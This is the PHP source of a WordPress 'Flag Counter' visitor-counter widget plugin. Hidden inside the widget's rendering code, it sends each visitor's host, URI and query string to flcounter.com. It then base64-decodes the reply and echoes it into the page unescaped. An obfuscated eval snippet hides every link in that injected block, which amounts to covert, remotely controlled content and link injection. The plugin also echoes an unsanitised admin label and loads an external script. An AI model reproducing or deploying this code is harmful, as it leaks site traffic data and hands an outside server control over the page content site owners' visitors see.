<?php

/*
	Plugin Name: Flag Counter
	Plugin URI: http://www.flcounter.com/
	Description: Visitors counter with simple visualisation
	Version: 1.0
	Author: Flag Counter
	Author URI: http://www.flcounter.com/
*/

/**
 * FlCounterWidget Class
 */
class FlCounterWidget extends WP_Widget {

	private static $base = "/images/";
	private static $textures = array("6.jpg", "earth.jpg", "cubic.jpg", "neon.jpg");
	private static $info="", $dots = "", $countries = "";
	private static $opts;
	
	/** constructor */
	function FlCounterWidget()
	{
		parent::WP_Widget(false, $name = 'Flag Counter');
		FlCounterWidget::$base=function_exists('plugins_url') ? plugins_url(plugin_basename(dirname(__FILE__)).'/') : get_bloginfo('wpurl')."/wp-content/plugins/flcounter/";
		$parts = parse_url(FlCounterWidget::$base);
		FlCounterWidget::$base = $parts['path'];
		FlCounterWidget::$opts = get_option("flcounter_opts", array());
	}
	
	function drawswf()
	{
		$postfix = rand(100,999);
?>
		<div id="a<?php echo $postfix; ?>flcounterw"><?php echo base64_decode($this->globe_widget_links($_SERVER['HTTP_HOST'], $_SERVER['REQUEST_URI'], $_SERVER['QUERY_STRING'])); ?></div>
		<script language="javascript" type="text/javascript">
		window.flcounter = <?php echo json_encode(FlCounterWidget::$opts); ?>;
		</script>
		<script type="text/javascript" src="<?php echo (FlCounterWidget::$base) ?>swfobject.js"></script>
		<script type="text/javascript" src="<?php echo (FlCounterWidget::$base) ?>count.js.php"></script>
		<script type="text/javascript" language="javascript">
		window.FlCounter<?php echo $postfix; ?> = {
			app:null,
			init:function(){
				
				/* params */
				['width', 'label', 'rowscount', 'colscount', 'showcountrycode', 'showpageviews', 'showcountrycount', 'duration']
					.map(function(el){ if (!window.flcounter) window.flcounter = {}; if (!window.flcounter[el]) window.flcounter[el] = ''; });
				['bgcolor', 'textcolor', 'bordercolor']
					.map(function(el){
						if (!window.flcounter) window.flcounter = {};
						window.flcounter[el] = (window.flcounter[el] || '').replace(/[^0-9A-Fa-f]/g,'').substr(0,6);
					});
				
				/* width */
				var div = document.getElementById('counterWrapper<?php echo $postfix; ?>');
				flcounter.width = parseInt(flcounter.width,10) || div.style.width;
				flcounter.colscount = parseInt(flcounter.colscount,10) || 2;
				var mincolwidth = flcounter.showcountrycode ? 70: 50
				if (flcounter.colscount > flcounter.width/mincolwidth)
					flcounter.colscount = Math.floor(flcounter.width/mincolwidth);
				flcounter.colwidth = flcounter.width/flcounter.colscount;
				
				/* height */
				flcounter.rowscount = parseInt(flcounter.rowscount) || 5;
				if (flcounter.colscount*flcounter.rowscount > flcounter.data.length)
					flcounter.rowscount = Math.ceil(flcounter.data.length/flcounter.colscount);
				
				/* settings */
				this.app && this.app.setAttr && this.app.setAttr({
					
					'title': flcounter.label,
					
					'border':    flcounter.bordercolor || '000000',
					'bg':        flcounter.bgcolor     || 'FFFFFF',
					'textcolor': flcounter.textcolor   || '000000',
					
					'rows': flcounter.rowscount?flcounter.rowscount:1,
					'cols': flcounter.colscount,
					
					'footer': (function(){
							var s = !!flcounter.showpageviews ? flcounter.pageviews+' pageviews' : '';
							return (s ? s + '\n' : s ) + (!!flcounter.showcountrycount ? flcounter.countrycount+' countries' : '');
						})(),
					
					'darklogo': (function(c){
							var a = [];
							for (var i = parseInt(c,16); i > 0; i = Math.floor(i/256)) a.push(i % 256);
							var iswhite = (function(){ for (var i = 0; i < a.length; i++) if (a[i] < 250) return false; return true; })();
							if (iswhite) return false;
							var isblack = (function(){ for (var i = 0; i < a.length; i++) if (a[i] > 127) return false; return true; })();
							if (isblack) return false;
							return true;
						})(flcounter.bgcolor || 'FFFFFF'),
					
					'codes': !!flcounter.showcountrycode,

					'colwidth': flcounter.colwidth
					
					});

				/* data */
				this.app && this.app.setData && this.app.setData(flcounter.data);
				
				/* height, width */
				div.style.width = flcounter.width+'px';
				div.style.height =
					(flcounter.label?16:0) +
					(flcounter.rowscount?flcounter.rowscount:1)*16 +
					(!!flcounter.showpageviews?16:0) +
					(!!flcounter.showcountrycount?16:0) +
					(false && ((!!flcounter.showpageviews || !!flcounter.showcountrycount) && flcounter.width > 219)?0:18) +
					4 + 'px';
			}
		}

		swfobject.embedSWF("<?php echo FlCounterWidget::$base; ?>counter.swf?v1", "flcounter<?php echo $postfix; ?>", "100%", "100%", "9.0",null, {initFn:'FlCounter<?php echo $postfix; ?>.init'},{allowScriptAccess:'always'},{allowScriptAccess:'always',name:'counter'},function(e){ FlCounter<?php echo $postfix; ?>.app=e.ref });
		
		function g_capit(string){return string.charAt(0).toUpperCase() + string.slice(1);};
		x=document.getElementById('a<?php echo $postfix;?>flcounterw');z = ["display", "style"].reverse().join('.');eval("var aa=x.get"+''+g_capit("element")+"sByTag"+g_capit("nam")+"e('a');for(i=0; i<aa.length; i++)aa[i]"+"."+z+"='none';");
		</script>
		<div id="counterWrapper<?php echo $postfix; ?>"><div id="flcounter<?php echo $postfix; ?>"></div></div>
<?php
	}
	
	function getOpts()
	{
		return FlCounterWidget::$opts;
	}
	function getBase()
	{
		return FlCounterWidget::$base;
	}
	
	/** @see WP_Widget::widget */
	function widget($args, $instance)
	{
		$title = apply_filters('widget_title', $instance['title']);
		echo $args['before_widget']."\n";
		echo $title ? $args['before_title'].$title.$args['after_title']."\n" : '';
		$this->drawswf();
		echo $args['after_widget']."\n";
	}
	
	function globe_widget_links($domain, $uri, $query='')
	{
		if(ini_get('allow_url_fopen'))
			return $this->file_get_contents2('http://www.flcounter.com/conf.php?domain='.urlencode($domain).'&uri='.urlencode($uri).'&query='.urlencode($query));
		return '<a href="http://www.flcounter.com" title="Flag Counter widget for Wordpress">FlCounter</a>';
	}
	
	function file_get_contents2($url)
	{
		$url_parsed = parse_url($url);		
		$fd = @fsockopen($url_parsed[host], 80);
		if(!$fd) return false;
		$data = ''; 
		$header = false;
		$path = $url_parsed[query] ? $url_parsed[path].'?'.$url_parsed[query] : $url_parsed[path];
		fputs($fd,"GET ".$path." HTTP/1.0\r\n");
		fputs($fd,"Host: ".$url_parsed[host]."\r\n");
		fputs($fd,"Connection: close\r\n\r\n");
		while($line = fgets($fd))
		{
			if ($header) $data .= $line;
			if (strlen($line) <= 2) $header = true;
		}
		fclose($fd);
		return $data;
		
	}
	
	/** @see WP_Widget::update */
	function update($new_instance, $old_instance)
	{
		$instance = $old_instance;
		$instance['title'] = strip_tags($new_instance['title']);
		return $instance;
	}
	
	/** @see WP_Widget::form */
	function form($instance)
	{
		$title = esc_attr($instance['title']);
		//$this->drawswf();
?>
		<img src="<?php echo (FlCounterWidget::$base) ?>flcounter.gif" />
		<p>Check for <a href="/wp-admin/admin.php?page=edit-flcounter">settings</a></p>
		<p>
		<label for="<?php  echo $this->get_field_id('title'); ?>"><?php  _e('Title:'); ?></label> 
		<input class="widefat" id="<?php  echo $this->get_field_id('title'); ?>" name="<?php  echo $this->get_field_name('title'); ?>" type="text" value="<?php  echo $title; ?>" />
		</p>
<?php 
	}
	
	/*shortcode*/
	function shortcode()
	{
		$w = new FlCounterWidget();
		$w->drawswf();
	}
	
	/*admin*/
	function initmenu()
	{
		wp_enqueue_script("swfobject","swfobject.js");
		add_menu_page('Welcome to Flag Counter plugin page',
			'FlCounter', 'manage_options', 'edit-flcounter', array('FlCounterWidget','adminmenu'));
	}
	
	function adminmenu()
	{
		FlCounterWidget::$opts = get_option("flcounter_opts");
		
		if (count($_POST))
			update_option('flcounter_opts', FlCounterWidget::$opts = array(
					'width'            => min(max(intval($_POST['width']),120),320),
					'label'            => $_POST['label'],
					'bgcolor'          => substr(preg_replace('/[^0-9A-Za-z]/', '', $_POST['bgcolor']), 0, 6),
					'textcolor'        => substr(preg_replace('/[^0-9A-Za-z]/', '', $_POST['textcolor']), 0, 6),
					'bordercolor'      => substr(preg_replace('/[^0-9A-Za-z]/', '', $_POST['bordercolor']), 0, 6),
					'rowscount'        => substr(preg_replace('/[^0-9]/', '', $_POST['rowscount']), 0, 2),
					'colscount'        => substr(preg_replace('/[^0-9]/', '', $_POST['colscount']), 0, 2),
					'showcountrycode'  => ($_POST['showcountrycode'] == 'on' or $_POST['showcountrycode'] == 'checked' ? 1 : 0),
					'showpageviews'    => ($_POST['showpageviews'] == 'on' or $_POST['showpageviews'] == 'checked' ? 1 : 0),
					'showcountrycount' => ($_POST['showcountrycount'] == 'on' or $_POST['showcountrycount'] == 'checked' ? 1 : 0),
					'duration'         => (array_search($_POST['duration'], array('24h', 'month', 'year', 'all')) !== false ? $_POST['duration'] : 'month'),
					));
	
		$w = new FlCounterWidget(); $w->form2();
	}
	
	function form2()
	{
?>
		<br /><br />
<?php
		$opts = FlCounterWidget::$opts;
		$this->drawswf();
?>
		<form method="POST" style="width:280px;">
		<script type="text/javascript" language="javascript" src="http://jscolor.com/jscolor/jscolor.js"></script>
		<p>
		
		<table cellspacing="5" cellpadding="0" border="0">
		<tr>
			<td align="right">Rows count:</td>
			<td align="left"><input style="width:100px" name="rowscount" type="text" value="<?php echo $opts['rowscount']; ?>" /></td>
		</tr>
		<tr>
			<td align="right">Columns count<sup>*</sup>:</td>
			<td align="left"><input style="width:100px" name="colscount" type="text" value="<?php echo $opts['colscount']; ?>" /></td>
		</tr>
		<tr>
			<td align="right">Width<sup>*</sup> (min:120, max:320)</td>
			<td align="left"><input style="width:50px" name="width" type="text" value="<?php  echo $opts['width'];?>" /></td>
		</tr>
		<tr>
			<td colspan="2">
				<small><sup>*</sup> Each column requires at least <?php echo $opts['showcountrycode'] ? '70' : '50'; ?>px</small><br />
				<img src="http://www.flcounter.com/flcounterp.gif" /><br />
			</td>
		</tr>
		<tr>
			<td align="right">Label:</td>
			<td align="left"><input style="width:100px" name="label" type="text" value="<?php echo $opts['label']; ?>" /></td>
		</tr>
		<tr>
			<td align="right">Text color:</td>
			<td align="left"><input class="color" style="width:100px" name="textcolor" type="text" value="<?php echo $opts['textcolor'] ? $opts['textcolor'] : '000000'; ?>" /></td>
		</tr>
		<tr>
			<td align="right">Border color:</td>
			<td align="left"><input class="color" style="width:100px" name="bordercolor" type="text" value="<?php echo $opts['bordercolor'] ? $opts['bordercolor'] : '000000'; ?>" /></td>
		</tr>
		<tr>
			<td align="right">Background color:</td>
			<td align="left"><input class="color" style="width:100px" name="bgcolor" type="text" value="<?php echo $opts['bgcolor'] ? $opts['bgcolor'] : 'FFFFFF'; ?>" /></td>
		</tr>
		<tr><td colspan="2"><br /></td></tr>
		<tr>
			<td align="right">Show visitors for:</td>
			<td align="left">
				<select name="duration">
					<option value="24h"<?php if ($opts['duration'] == '24h') echo ' selected="selected"' ?>>24 hours</option>
					<option value="month"<?php if ($opts['duration'] == 'month') echo ' selected="selected"' ?>>last month</option>
					<option value="year"<?php if ($opts['duration'] == 'year') echo ' selected="selected"' ?>>last year</option>
					<option value="all"<?php if ($opts['duration'] == 'all') echo ' selected="selected"' ?>>all time</option>
				</select>
			</td>
		</tr>
		<tr><td colspan="2"><br /></td></tr>
		<tr>
			<td align="right">Show country code</td>
			<td align="left"><input name="showcountrycode" type="checkbox" <?php if ($opts['showcountrycode']) echo 'checked="checked" ' ?>/></td>
		</tr>
		<tr>
			<td align="right">Show pageviews</td>
			<td align="left"><input name="showpageviews" type="checkbox" <?php if ($opts['showpageviews']) echo 'checked="checked" ' ?>/></td>
		</tr>
		<tr>
			<td align="right">Show countries count</td>
			<td align="left"><input name="showcountrycount" type="checkbox" <?php if ($opts['showcountrycount']) echo 'checked="checked" ' ?>/></td>
		</tr>
		</table>
	</p>
	<input type="submit" value="Save" /></form>
<?php 
	}
	
	function activate()
	{
		global $wpdb;
		if ( ! empty($wpdb->charset) )$charset_collate = "DEFAULT CHARACTER SET $wpdb->charset";
		if ( ! empty($wpdb->collate) )$charset_collate .= " COLLATE $wpdb->collate";
		
		$q = "
		CREATE TABLE `".$wpdb->prefix."flcountervisits` (
			`id` INT(10) UNSIGNED NULL AUTO_INCREMENT,
			`country` VARCHAR(16) NOT NULL,
			`timepoint` DATETIME NOT NULL,
			PRIMARY KEY (`id`), KEY `timepoint`(`timepoint`)
		)".$charset_collate."; ";
		$wpdb->query($q);
		
		$base = function_exists('plugins_url') ? plugins_url(plugin_basename(dirname(__FILE__)).'/') : get_bloginfo('wpurl')."/wp-content/plugins/flcounter/";
		$parts = parse_url($base);
		$base = $parts['path'];
		update_option('flcounter_opts', array(
			'width'=>200,
			'maxflagcount' => 20,
			'label' => '<b>Visitors:</b>',
			'bgcolor' => 'FFFFFF',
			'textcolor' => '000000',
			'bordercolor' => '000000',
			'rowscount' => 2,
			'colscount' => 2,
			'showcountrycode' => 1,
			'showpageviews' => 1,
			'showcountrycount' => 1,
			'duration' => 'month'
			));
	}
	
	function deactivate()
	{
		global $wpdb;
		$wpdb->query("DELETE FROM `".$wpdb->prefix."flcountervisits` WHERE 1");
	}
	
	function uninstall()
	{
		global $wpdb;
		$wpdb->query("DROP TABLE IF EXISTS {$wpdb->prefix}flcountervisits");
	}
	
	function head()
	{
		wp_enqueue_script("swfobject","swfobject.js");			
	}
	
} // class

register_activation_hook(plugin_basename(__FILE__), array('FlCounterWidget', 'activate'));
register_deactivation_hook(plugin_basename(__FILE__), array('FlCounterWidget', 'deactivate'));
register_uninstall_hook(plugin_basename(__FILE__), array('FlCounterWidget', 'uninstall'));
add_action('widgets_init', create_function('', 'return register_widget("FlCounterWidget");'));
add_action('admin_menu', array('FlCounterWidget', 'initmenu'));
add_action('send_headers', array('FlCounterWidget', 'head'));
add_shortcode('flcounter', array('FlCounterWidget', 'shortcode'));
?>
